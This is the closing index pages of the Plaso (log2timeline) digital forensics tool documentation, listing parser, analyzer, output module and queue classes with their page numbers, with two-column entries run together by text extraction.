(plaso.parsers.mac_securityd.MacOSSecuritydLogParser value_name (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventDatamethod), 390 attribute), 341 VerifyStructure() (plaso.parsers.mac_wifi.MacWifiLogParser value_name (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDatamethod), 391 attribute), 349 VerifyStructure() (plaso.parsers.popcontest.PopularityContestParser value_string (plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventDatamethod), 414 attribute), 336 VerifyStructure() (plaso.parsers.santa.SantaParser value_type (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttributemethod), 424 attribute), 432 VerifyStructure() (plaso.parsers.sccm.SCCMParser values (plaso.containers.windows_events.WindowsRegistryEventDatamethod), 425 attribute), 122 VerifyStructure() (plaso.parsers.selinux.SELinuxParser values (plaso.formatters.interface.EnumerationEventFormatterHelpermethod), 427 attribute), 171 VerifyStructure() (plaso.parsers.setupapi.SetupapiLogParser values (plaso.formatters.interface.FlagsEventFormatterHelper method), 428 attribute), 173 VerifyStructure() (plaso.parsers.skydrivelog.SkyDriveLogParser values (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDatamethod), 429 attribute), 341 VerifyStructure() (plaso.parsers.skydrivelog.SkyDriveOldLogParser method), 430

Index 611 Plaso (log2timeline), Release 20210606

VerifyStructure() (plaso.parsers.sophos_av.SophosAVLogParservisit_count (plaso.parsers.plist_plugins.safari.SafariHistoryEventData method), 431 attribute), 237 VerifyStructure() (plaso.parsers.syslog.SyslogParser visit_count (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData method), 444 attribute), 266 VerifyStructure() (plaso.parsers.text_parser.PyparsingMultiLineTextParservisit_count (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData method), 447 attribute), 267 VerifyStructure() (plaso.parsers.text_parser.PyparsingSingleLineTextParservisit_count (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData method), 448 attribute), 292 VerifyStructure() (plaso.parsers.vsftpd.VsftpdLogParservisit_source (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData method), 454 attribute), 254 VerifyStructure() (plaso.parsers.winfirewall.WinFirewallParservisit_type (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData method), 459 attribute), 267 VerifyStructure() (plaso.parsers.xchatlog.XChatLogParservisitor_id (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData method), 466 attribute), 214 VerifyStructure() (plaso.parsers.xchatscrollback.XChatScrollbackParservolume (plaso.parsers.santa.SantaMountEventData at- method), 468 tribute), 421 VerifyStructure() (plaso.parsers.zsh_extended_history.ZshExtendedHistoryParservolume_device_paths method), 469 (plaso.parsers.winprefetch.WinPrefetchExecutionEventData version (plaso.containers.artifacts.OperatingSystemArtifact attribute), 463 attribute), 99 volume_label (plaso.parsers.winlnk.WinLnkLinkEventData version (plaso.parsers.firefox_cache.FirefoxCacheEventData attribute), 462 attribute), 374 volume_serial_numbers version (plaso.parsers.symantec.SymantecEventData (plaso.parsers.winprefetch.WinPrefetchExecutionEventData attribute), 440 attribute), 463 version (plaso.parsers.winreg_plugins.amcache.AMCacheProgramEventDataVsftpdEventData (class in plaso.parsers.vsftpd), 454 attribute), 320 VsftpdLogParser (class in plaso.parsers.vsftpd), 454 version (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData attribute), 350 W version_path (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDatawait_after_analysis attribute), 282 (plaso.analysis.hash_tagging.HashAnalyzer version_tuple (plaso.containers.artifacts.OperatingSystemArtifact attribute), 41 property), 99 wait_after_analysis VFSBackEndArgumentsHelper (class in (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer at- plaso.cli.helpers.vfs_backend), 78 tribute), 47 video_conference (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDatawas_http_non_get (plaso.parsers.plist_plugins.safari.SafariHistoryEventData attribute), 295 attribute), 237 ViewsFactory (class in plaso.cli.views), 96 was_http_non_get (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData ViperAnalysisArgumentsHelper (class in attribute), 293 plaso.cli.helpers.viper_analysis), 78 web_url (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventData ViperAnalysisPlugin (class in plaso.analysis.viper), attribute), 304 50 WebViewCookieEventData (class in ViperAnalyzer (class in plaso.analysis.viper), 50 plaso.parsers.sqlite_plugins.android_webview), virus (plaso.parsers.symantec.SymantecEventData at- 245 tribute), 440 WebViewPlugin (class in virus_id (plaso.parsers.symantec.SymantecEventData plaso.parsers.sqlite_plugins.android_webview), attribute), 440 245 VirusTotalAnalysisArgumentsHelper (class in where (plaso.parsers.mac_keychain.KeychainInternetRecordEventData plaso.cli.helpers.virustotal_analysis), 79 attribute), 388 VirusTotalAnalysisPlugin (class in windows_eventlog_providers plaso.analysis.virustotal), 51 (plaso.containers.artifacts.SystemConfigurationArtifact VirusTotalAnalyzer (class in attribute), 102 plaso.analysis.virustotal), 52 WindowsAllUsersAppDataKnowledgeBasePlugin virustype (plaso.parsers.symantec.SymantecEventData (class in plaso.preprocessors.windows), 475 attribute), 440

612 Index Plaso (log2timeline), Release 20210606

WindowsAllUsersAppProfileKnowledgeBasePlugin WindowsRegistryPlugin (class in (class in plaso.preprocessors.windows), 475 plaso.parsers.winreg_plugins.interface), WindowsAllUsersProfileEnvironmentVariablePlugin 326 (class in plaso.preprocessors.windows), 476 WindowsRegistryServiceEventData (class in WindowsAvailableTimeZonesPlugin (class in plaso.parsers.winreg_plugins.services), 340 plaso.preprocessors.windows), 476 WindowsRegistryValueArtifactPreprocessorPlugin WindowsBootExecuteEventData (class in (class in plaso.preprocessors.interface), 471 plaso.parsers.winreg_plugins.lfu), 328 WindowsRegistryValuesFormatterHelper (class in WindowsBootVerificationEventData (class in plaso.formatters.winreg), 177 plaso.parsers.winreg_plugins.lfu), 328 WindowsService (class in WindowsCodepagePlugin (class in plaso.analysis.windows_services), 52 plaso.preprocessors.windows), 476 WindowsServiceCollection (class in WindowsDistributedLinkTrackingEventData (class plaso.analysis.windows_services), 53 in plaso.containers.windows_events), 121 WindowsServicesAnalysisArgumentsHelper (class WindowsEnvironmentVariableArtifactPreprocessorPlugin in plaso.cli.helpers.windows_services_analysis), (class in plaso.preprocessors.windows), 476 80 WindowsEventLogProviderArtifact (class in WindowsServicesAnalysisPlugin (class in plaso.containers.artifacts), 103 plaso.analysis.windows_services), 54 WindowsEventLogProvidersPlugin (class in WindowsShortcutLinkedPathFormatterHelper plaso.preprocessors.windows), 476 (class in plaso.formatters.winlnk), 176 WindowsHostnamePlugin (class in WindowsSystemProductPlugin (class in plaso.preprocessors.windows), 476 plaso.preprocessors.windows), 477 WindowsPathEnvironmentVariableArtifactPreprocessorPluginWindowsSystemRootEnvironmentVariablePlugin (class in plaso.preprocessors.windows), 476 (class in plaso.preprocessors.windows), 477 WindowsPrefetchPathHintsFormatterHelper (class WindowsSystemVersionPlugin (class in in plaso.formatters.winprefetch), 177 plaso.preprocessors.windows), 477 WindowsPrefetchVolumesStringFormatterHelper WindowsTimelineGenericEventData (class in (class in plaso.formatters.winprefetch), 177 plaso.parsers.sqlite_plugins.windows_timeline), WindowsProgramDataEnvironmentVariablePlugin 311 (class in plaso.preprocessors.windows), 476 WindowsTimelinePlugin (class in WindowsProgramDataKnowledgeBasePlugin (class in plaso.parsers.sqlite_plugins.windows_timeline), plaso.preprocessors.windows), 476 312 WindowsProgramFilesEnvironmentVariablePlugin WindowsTimelineUserEngagedEventData (class in (class in plaso.preprocessors.windows), 477 plaso.parsers.sqlite_plugins.windows_timeline), WindowsProgramFilesX86EnvironmentVariablePlugin 314 (class in plaso.preprocessors.windows), 477 WindowsTimeZonePlugin (class in WindowsRegistryEventData (class in plaso.preprocessors.windows), 477 plaso.containers.windows_events), 122 WindowsTimezoneSettingsEventData (class in WindowsRegistryInstallationEventData (class in plaso.parsers.winreg_plugins.timezone), 345 plaso.parsers.winreg_plugins.windows_version), WindowsUSBDeviceEventData (class in 349 plaso.parsers.winreg_plugins.usb), 346 WindowsRegistryKeyArtifactPreprocessorPlugin WindowsUserAccountsPlugin (class in (class in plaso.preprocessors.interface), 470 plaso.preprocessors.windows), 477 WindowsRegistryKeyPathFilter (class in WindowsVersionPlugin (class in plaso.parsers.winreg_plugins.interface), plaso.parsers.winreg_plugins.windows_version), 325 350 WindowsRegistryKeyPathPrefixFilter (class in WindowsVolumeEventData (class in plaso.parsers.winreg_plugins.interface), 326 plaso.containers.windows_events), 122 WindowsRegistryKeyPathSuffixFilter (class in WindowsWinDirEnvironmentVariablePlugin (class plaso.parsers.winreg_plugins.interface), 326 in plaso.preprocessors.windows), 477 WindowsRegistryKeyWithValuesFilter (class in WinEvtParser (class in plaso.parsers.winevt), 455 plaso.parsers.winreg_plugins.interface), 326 WinEvtRecordEventData (class in WindowsRegistryNetworkListEventData (class in plaso.parsers.winevt), 455 plaso.parsers.winreg_plugins.networks), 335 WinevtResourcesSqlite3DatabaseReader (class in

Index 613 Plaso (log2timeline), Release 20210606

plaso.formatters.winevt_rc), 176 Write() (plaso.cli.views.CLITabularTableView method), WinEvtxParser (class in plaso.parsers.winevtx), 456 96 WinEvtxRecordEventData (class in Write() (plaso.cli.views.MarkdownTableView method), plaso.parsers.winevtx), 456 96 WinFirewallEventData (class in WriteEvent() (plaso.output.interface.OutputModule plaso.parsers.winfirewall), 458 method), 197 WinFirewallParser (class in WriteEventBody() (plaso.output.interface.OutputModule plaso.parsers.winfirewall), 459 method), 197 WinIISParser (class in plaso.parsers.iis), 380 WriteEventBody() (plaso.output.interface.TextFileOutputModule WinJobEventData (class in plaso.parsers.winjob), 460 method), 198 WinJobParser (class in plaso.parsers.winjob), 460 WriteEventBody() (plaso.output.json_line.JSONLineOutputModule WinLnkLinkEventData (class in plaso.parsers.winlnk), method), 199 461 WriteEventBody() (plaso.output.json_out.JSONOutputModule WinLnkParser (class in plaso.parsers.winlnk), 462 method), 199 WinlogonEventData (class in WriteEventBody() (plaso.output.kml.KMLOutputModule plaso.parsers.winreg_plugins.winlogon), method), 200 350 WriteEventBody() (plaso.output.null.NullOutputModule WinlogonPlugin (class in method), 205 plaso.parsers.winreg_plugins.winlogon), WriteEventBody() (plaso.output.shared_elastic.SharedElasticsearchOutputModule 351 method), 208 WinPrefetchExecutionEventData (class in WriteEventBody() (plaso.output.xlsx.XLSXOutputModule plaso.parsers.winprefetch), 463 method), 210 WinPrefetchParser (class in WriteEventMACBGroup() plaso.parsers.winprefetch), 463 (plaso.output.interface.OutputModule method), WinRARHistoryEventData (class in 197 plaso.parsers.winreg_plugins.winrar), 351 WriteEventMACBGroup() WinRARHistoryPlugin (class in (plaso.output.l2t_csv.L2TCSVOutputModule plaso.parsers.winreg_plugins.winrar), 351 method), 201 WinRecycleBinEventData (class in WriteFooter() (plaso.output.interface.OutputModule plaso.parsers.recycler), 416 method), 198 WinRecycleBinParser (class in WriteFooter() (plaso.output.json_out.JSONOutputModule plaso.parsers.recycler), 417 method), 199 WinRecyclerInfo2Parser (class in WriteFooter() (plaso.output.kml.KMLOutputModule plaso.parsers.recycler), 417 method), 200 WinRegistryParser (class in WriteHeader() (plaso.output.elastic.ElasticsearchOutputModule plaso.parsers.winreg_parser), 464 method), 195 WinRegTimezonePlugin (class in WriteHeader() (plaso.output.elastic_ts.ElasticTimesketchOutputModule plaso.parsers.winreg_plugins.timezone), method), 196 344 WriteHeader() (plaso.output.interface.OutputModule WORD (plaso.parsers.iis.WinIISParser attribute), 381 method), 198 workers_status (plaso.engine.processing_status.ProcessingStatusWriteHeader() (plaso.output.json_out.JSONOutputModule property), 144 method), 199 WorkersArgumentsHelper (class in WriteHeader() (plaso.output.kml.KMLOutputModule plaso.cli.helpers.workers), 80 method), 200 working_directory (plaso.parsers.winjob.WinJobEventDataWriteHeader() (plaso.output.l2t_csv.L2TCSVOutputModule attribute), 460 method), 201 working_directory (plaso.parsers.winlnk.WinLnkLinkEventDataWriteHeader() (plaso.output.shared_dsv.DSVOutputModule attribute), 462 method), 207 Write() (plaso.cli.tools.CLIOutputWriter method), 93 WriteHeader() (plaso.output.xlsx.XLSXOutputModule Write() (plaso.cli.tools.FileObjectOutputWriter method), 210 method), 95 WriteLine() (plaso.output.interface.TextFileOutputModule Write() (plaso.cli.tools.StdoutOutputWriter method), 95 method), 198 Write() (plaso.cli.views.BaseTableView method), 96 WritePreprocessingInformation() Write() (plaso.cli.views.CLITableView method), 96 (plaso.storage.redis.writer.RedisStorageWriter

614 Index Plaso (log2timeline), Release 20210606

method), 488 X WRITES_OUTPUT_FILE (plaso.output.interface.OutputModuleXChatLogEventData (class in plaso.parsers.xchatlog), attribute), 197 466 WRITES_OUTPUT_FILE (plaso.output.interface.TextFileOutputModuleXChatLogParser (class in plaso.parsers.xchatlog), 466 attribute), 198 XChatScrollbackEventData (class in WRITES_OUTPUT_FILE (plaso.output.xlsx.XLSXOutputModule plaso.parsers.xchatscrollback), 467 attribute), 210 XChatScrollbackParser (class in WriteSerialized() (plaso.serializer.interface.AttributeContainerSerializerplaso.parsers.xchatscrollback), 467 method), 478 XLSXOutputArgumentsHelper (class in WriteSerialized() (plaso.serializer.json_serializer.JSONAttributeContainerSerializerplaso.cli.helpers.xlsx_output), 81 class method), 479 XLSXOutputModule (class in plaso.output.xlsx), 210 WriteSerializedDict() xml_string (plaso.parsers.winevtx.WinEvtxRecordEventData (plaso.serializer.json_serializer.JSONAttributeContainerSerializerattribute), 457 class method), 479 XMLProcessStatusRPCClient (class in WriteSessionCompletion() plaso.multi_process.plaso_xmlrpc), 190 (plaso.storage.redis.writer.RedisStorageWriter XMLProcessStatusRPCServer (class in method), 488 plaso.multi_process.plaso_xmlrpc), 190 WriteSessionCompletion() XMLRPCClient (class in (plaso.storage.writer.StorageWriter method), plaso.multi_process.plaso_xmlrpc), 190 503 WriteSessionConfiguration() Y (plaso.storage.redis.writer.RedisStorageWriter yaml_tag (plaso.analysis.windows_services.WindowsService method), 488 WriteSessionConfiguration() attribute), 53 YAMLFilterFile (class in plaso.engine.yaml_filter_file), (plaso.storage.writer.StorageWriter method), 148 503 YAMLFormattersFile WriteSessionStart() (class in plaso.formatters.yaml_formatters_file), 177 (plaso.storage.redis.writer.RedisStorageWriter yara_match (plaso.containers.events.EventDataStream method), 488 WriteSessionStart() attribute), 105 yara_rules_string (plaso.engine.configurations.ExtractionConfiguration (plaso.storage.writer.StorageWriter method), attribute), 124 503 YaraAnalyzer WriteTaskCompletion() (class in plaso.analyzers.yara_analyzer), 61 (plaso.storage.fake.writer.FakeStorageWriter YaraRulesArgumentsHelper (class in method), 483 WriteTaskCompletion() plaso.cli.helpers.yara_rules), 81 year (plaso.engine.knowledge_base.KnowledgeBase (plaso.storage.interface.BaseStore method), property), 134 497 year WriteTaskCompletion() (plaso.parsers.mediator.ParserMediator property), 400 (plaso.storage.writer.StorageWriter method), 503 Z WriteTaskStart() (plaso.storage.fake.writer.FakeStorageWriter ZeitgeistActivityDatabasePlugin (class in method), 483 plaso.parsers.sqlite_plugins.zeitgeist), 314 WriteTaskStart() (plaso.storage.interface.BaseStore ZeitgeistActivityEventData (class in method), 498 plaso.parsers.sqlite_plugins.zeitgeist), 315 WriteTaskStart() (plaso.storage.writer.StorageWriter ZeroMQBufferedQueue (class in method), 503 plaso.engine.zeromq_queue), 149 WriteText() (plaso.output.interface.TextFileOutputModule ZeroMQBufferedReplyBindQueue (class in method), 198 plaso.engine.zeromq_queue), 149 WrongBencodePlugin, 181 ZeroMQBufferedReplyQueue (class in WrongFormatter, 181 plaso.engine.zeromq_queue), 149 WrongPlugin, 182 ZeroMQPullConnectQueue (class in WrongQueueType, 182 plaso.engine.zeromq_queue), 150

Index 615 Plaso (log2timeline), Release 20210606

ZeroMQPullQueue (class in plaso.engine.zeromq_queue), 150 ZeroMQPushBindQueue (class in plaso.engine.zeromq_queue), 151 ZeroMQPushQueue (class in plaso.engine.zeromq_queue), 151 ZeroMQQueue (class in plaso.engine.zeromq_queue), 152 ZeroMQRequestConnectQueue (class in plaso.engine.zeromq_queue), 153 ZeroMQRequestQueue (class in plaso.engine.zeromq_queue), 153 ZshExtendedHistoryParser (class in plaso.parsers.zsh_extended_history), 468 ZshHistoryEventData (class in plaso.parsers.zsh_extended_history), 469

616 Index